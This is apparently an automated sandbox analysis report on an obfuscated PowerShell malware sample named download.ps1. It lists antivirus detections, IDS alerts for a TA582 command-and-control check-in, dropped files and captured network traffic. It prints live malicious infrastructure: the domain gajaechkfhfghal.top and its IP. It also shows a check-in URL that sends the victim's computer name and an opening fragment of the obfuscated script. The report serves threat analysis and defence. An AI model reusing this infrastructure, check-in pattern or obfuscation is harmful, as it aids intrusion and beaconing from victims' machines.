VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
download.ps110%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.micr)0%Avira URL Cloudsafe
http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?id=$env:computername&key=$ihwdqrvefno&s=5270%Avira URL Cloudsafe
http://gajaechkfhfghal.top100%Avira URL Cloudmalware
http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.65.196
truefalse
    high
    gajaechkfhfghal.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
        high
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.137017490133.000001CF2CEA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?powershell.exe, 00000000.00000002.137017490133.000001CF2D0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.137017490133.000001CF2DEFE000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqpowershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.micr)powershell.exe, 00000000.00000002.137050940017.000001CF43F10000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://$jm9lqy6w1pihvt8/$6lmkrt5pui8sed3.php?id=$env:computername&key=$ihwdqrvefno&s=527powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/recaptcha/api.jspowershell.exe, 00000000.00000002.137017490133.000001CF2CF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137017490133.000001CF2CF54000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.137042985676.000001CF3BD51000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.compowershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.quovadis.bm0powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/Pester/PesterXzpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGpowershell.exe, 00000000.00000002.137017490133.000001CF2CF26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.137049725010.000001CF43E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.137017490133.000001CF2BCE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000000.00000002.137017490133.000001CF2BF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.65.196
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        45.61.136.138
                                                        gajaechkfhfghal.topUnited States
                                                        40676AS40676USfalse
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1581377
                                                        Start date and time:2024-12-27 14:36:55 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 5m 30s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Suspected VM Detection
                                                        Number of analysed new started processes analysed:4
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:download.ps1
                                                        Detection:MAL
                                                        Classification:mal80.evad.winPS1@2/7@2/2
                                                        EGA Information:Failed
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .ps1
                                                        • Stop behavior analysis, all processes terminated
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        TimeTypeDescription
                                                        08:39:05API Interceptor36x Sleep call for process: powershell.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/fm2yw8l13shtr.php?id=user-PC&key=91595968094&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/roqyfncdwahtr.php?id=user-PC&key=81114521757&s=527
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                        • 45.34.255.95
                                                        armv6l.elfGet hashmaliciousMiraiBrowse
                                                        • 45.34.153.95
                                                        download.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.61.136.138
                                                        No context
                                                        No context
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:@...e...........................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6222
                                                        Entropy (8bit):3.748854004444535
                                                        Encrypted:false
                                                        SSDEEP:96:JxkPGjChG3HkvhkvCCt7D06jIUH8D06jIUHx:MPEbvNk3Nkc
                                                        MD5:18412ECD95186553A81097E80EFE47B7
                                                        SHA1:E1F4FB6E95C5C2ADF772608C7A5576FAFA38E131
                                                        SHA-256:9BC1654CAA104DC27893447F626F7ABE339BAC5B62DE58FBE4A3E25ABDEF24AE
                                                        SHA-512:E146408F324EEAF214D1AD5BE55605EDC7D90C062B59DC8F121B082D63C31CD5764476D8A24CDB8592984995D10E3D9BBC87A50B01D256225CA4C6BC71EDFA20
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...;.}.S...1p$.dX..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...[...dX....+.dX......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.l....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.l..Roaming.@......"S.Y.l....D.....................9...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.l....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.<..Windows.@......"S.Y.l....F....................."T..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.<....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.<....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yf.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.l....i...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6222
                                                        Entropy (8bit):3.748854004444535
                                                        Encrypted:false
                                                        SSDEEP:96:JxkPGjChG3HkvhkvCCt7D06jIUH8D06jIUHx:MPEbvNk3Nkc
                                                        MD5:18412ECD95186553A81097E80EFE47B7
                                                        SHA1:E1F4FB6E95C5C2ADF772608C7A5576FAFA38E131
                                                        SHA-256:9BC1654CAA104DC27893447F626F7ABE339BAC5B62DE58FBE4A3E25ABDEF24AE
                                                        SHA-512:E146408F324EEAF214D1AD5BE55605EDC7D90C062B59DC8F121B082D63C31CD5764476D8A24CDB8592984995D10E3D9BBC87A50B01D256225CA4C6BC71EDFA20
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...;.}.S...1p$.dX..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...[...dX....+.dX......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y.l....B......................A!.A.p.p.D.a.t.a...B.V.1......Y.l..Roaming.@......"S.Y.l....D.....................9...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y.l....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......Y.<..Windows.@......"S.Y.l....F....................."T..W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.Y.<....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.Y.<....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yf.....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Y.l....i...........
                                                        File type:ASCII text, with very long lines (11001), with CRLF line terminators
                                                        Entropy (8bit):5.95713131997573
                                                        TrID:
                                                          File name:download.ps1
                                                          File size:20'814 bytes
                                                          MD5:4b6d9a93fec91f40e96d5a5640545349
                                                          SHA1:17bacbf0e331703514280b7f53d2d2da05385321
                                                          SHA256:441f1bb67c8147a05d2624d68cb631280783aed18c867f7ae42bc86520a79670
                                                          SHA512:2f91fb8764bf2ccdbfe1dbc8d4813f816a6933f6f55c5f4d7243eca36214888340b268301e45099c66739c88a14ad15b2c7e37b2593303e63673f60c811a12b8
                                                          SSDEEP:384:2lNOZVhoZNGDPShwVToRpReezcD0t3KkObxIWTJ+Al1r1s6ynhUFjtbqGtTMnV32:2LOZVheNVRLVzck33ObqQX1r1TyWltbH
                                                          TLSH:F9928EA5B7C0ECE1C6DD877E4506BC087F2A707EC0EAB9C4FA99D6C123917406E88D81
                                                          File Content Preview:$zlxnurcs=$executioncontext;$orinisalonalrearistion = (-JOIn (@((-9868+(5119236/(982-(-2772+(4929-1691))))),(-5325+5377),(-7228+7285),(308600/(16157-(105+9880))),(-6419+(25731650/3974)),(-4489+4543),(-2200+(7485-5229)),(23375/(2694-(1352324/596))),(-7779+
                                                          Icon Hash:3270d6baae77db44
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-27T14:39:07.851293+01002859405ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.11.20556841.1.1.153UDP
                                                          2024-12-27T14:39:09.846752+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.204975945.61.136.13880TCP
                                                          2024-12-27T14:39:09.846752+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204975945.61.136.13880TCP
                                                          2024-12-27T14:39:10.447985+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.11.2049760142.250.65.19680TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 27, 2024 14:39:07.966706991 CET4975980192.168.11.2045.61.136.138
                                                          Dec 27, 2024 14:39:08.128046036 CET804975945.61.136.138192.168.11.20
                                                          Dec 27, 2024 14:39:08.128304005 CET4975980192.168.11.2045.61.136.138
                                                          Dec 27, 2024 14:39:08.130953074 CET4975980192.168.11.2045.61.136.138
                                                          Dec 27, 2024 14:39:08.292081118 CET804975945.61.136.138192.168.11.20
                                                          Dec 27, 2024 14:39:09.797530890 CET804975945.61.136.138192.168.11.20
                                                          Dec 27, 2024 14:39:09.846751928 CET4975980192.168.11.2045.61.136.138
                                                          Dec 27, 2024 14:39:09.896204948 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:09.993411064 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:09.993602991 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:09.993731022 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.091058969 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.447686911 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.447698116 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.447984934 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.449071884 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.545536041 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.553057909 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.553082943 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.553364038 CET8049760142.250.65.196192.168.11.20
                                                          Dec 27, 2024 14:39:10.553376913 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.596616983 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.671648979 CET4976080192.168.11.20142.250.65.196
                                                          Dec 27, 2024 14:39:10.671787977 CET4975980192.168.11.2045.61.136.138
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 27, 2024 14:39:07.851293087 CET5568453192.168.11.201.1.1.1
                                                          Dec 27, 2024 14:39:07.958980083 CET53556841.1.1.1192.168.11.20
                                                          Dec 27, 2024 14:39:09.799380064 CET6314653192.168.11.201.1.1.1
                                                          Dec 27, 2024 14:39:09.894293070 CET53631461.1.1.1192.168.11.20
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 27, 2024 14:39:07.851293087 CET192.168.11.201.1.1.10x91e6Standard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                          Dec 27, 2024 14:39:09.799380064 CET192.168.11.201.1.1.10xeb99Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 27, 2024 14:39:07.958980083 CET1.1.1.1192.168.11.200x91e6No error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                          Dec 27, 2024 14:39:09.894293070 CET1.1.1.1192.168.11.200xeb99No error (0)www.google.com142.250.65.196A (IP address)IN (0x0001)false
                                                          • gajaechkfhfghal.top
                                                          • www.google.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.11.204975945.61.136.138804308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 27, 2024 14:39:08.130953074 CET215OUTGET /fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527 HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: gajaechkfhfghal.top
                                                          Connection: Keep-Alive
                                                          Dec 27, 2024 14:39:09.797530890 CET166INHTTP/1.1 302 Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Fri, 27 Dec 2024 13:39:09 GMT
                                                          Content-Length: 0
                                                          Connection: keep-alive
                                                          Location: http://www.google.com


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.11.2049760142.250.65.196804308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 27, 2024 14:39:09.993731022 CET159OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: www.google.com
                                                          Connection: Keep-Alive
                                                          Dec 27, 2024 14:39:10.447686911 CET1289INHTTP/1.1 302 Found
                                                          Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                          x-hallmonitor-challenge: CgwI_tu6uwYQ6Oy3twESBJoQwNw
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-pvJDvkZIGBCgIXahFvr47A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Date: Fri, 27 Dec 2024 13:39:10 GMT
                                                          Server: gws
                                                          Content-Length: 396
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: AEC=AZ6Zc-Wi9tx2x6JPa3Nq2vNg6DrLkCObJs0E1km21t6Pi-pnqctizsO1ELY; expires=Wed, 25-Jun-2025 13:39:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                          Set-Cookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh; expires=Sat, 28-Jun-2025 13:39:10 GMT; path=/; domain=.google.com; HttpOnly
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/ht
                                                          Dec 27, 2024 14:39:10.447698116 CET336INData Raw: 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f
                                                          Data Ascii: ml;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://www.google.com/sorry/index?continue=http://www.google.com/&amp;q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL
                                                          Dec 27, 2024 14:39:10.449071884 CET522OUTGET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGP7bursGIjCbjtSF4XG8tTvGbwS4-XkOznBE-Ob5uLQbryjcrlFpigL16PI09sJUHfqEGz8Sof0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                          Host: www.google.com
